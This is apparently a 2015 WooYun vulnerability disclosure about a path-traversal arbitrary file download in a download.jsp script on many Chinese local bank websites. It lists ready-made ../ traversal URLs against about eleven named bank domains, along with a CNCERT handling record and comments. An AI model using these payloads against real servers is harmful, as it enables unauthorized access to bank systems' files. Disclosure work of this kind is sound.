当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091246

漏洞标题:某系统漏洞影响国内多家地方银行

相关厂商:国内多家地方银行

漏洞作者: leaf

提交时间:2015-01-12 13:28

修复时间:2015-02-26 13:30

公开时间:2015-02-26 13:30

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

在某地方银行网站了解办卡相关业务,竟有意外收获...
隐约记得前段时间有两条新闻,都是银行卡无故多出巨款...个中原因不得而知,不过所幸只是多,不是少...

详细说明:

目标站点:www.xtbank.com
原始链接:

http://www.xtbank.com/download/download.jsp?filepath=/site902/uploadfiles/zxgg/1413941582458.xls&filename=1413941582458.xls&ei=Ht2xVLPgGpOnyASX34DACA&usg=AFQjCNGeC93YEDRmk2Km8iyVcBb7iv8VNQ


变换下:

http://www.xtbank.com/download/download.jsp?filepath=download/download.jsp


QQ图片20150111154317.jpg


再次变换:

http://www.xtbank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


2015-01-11_184748.png


无疑,典型的任意文件下载...
===============================================================================
猜测可能是某cms或者某外包公司作品,按照关键字搜索,可以发现还有其它多家地方银行存在此类问题(包括但不限于以下):
攀枝花市商业银行

http://ebank.pzhccb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


曲靖市商业银行

http://qjccb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


承德银行

http://www.chengdebank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


葫芦岛银行

http://www.bankofhld.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


衡水银行

http://www.hengshuibank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


重庆三峡银行

http://www.ccqtgb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


抚顺银行

http://www.bankoffs.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


玉溪市商业银行

http://www.yxccb.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


城市商业银行资金清算中心

http://www.ccfccb.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini


保定银行

http://www.bd-bank.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini

漏洞证明:

如上所述!

修复方案:

版权声明:转载请注明来源 leaf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-16 11:51

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河北分中心,由河北分中心后续协调网站管理单位处置。

最新状态:

2015-01-16:追加回复:已经下发给各分中心,由各分中心后续协调网站管理单位。


漏洞评价:

评论

  1. 2015-01-12 13:31 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    亮点是某个单位啊。

  2. 2015-01-12 14:05 | 影刺 ( 实习白帽子 | Rank:67 漏洞数:25 | 关注web安全)

    这个关注下

  3. 2015-01-28 09:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我就说为什么那么眼熟? WooYun: 一批中小银行任意文件下载 @疯狗 @Finger 没有验证重复吗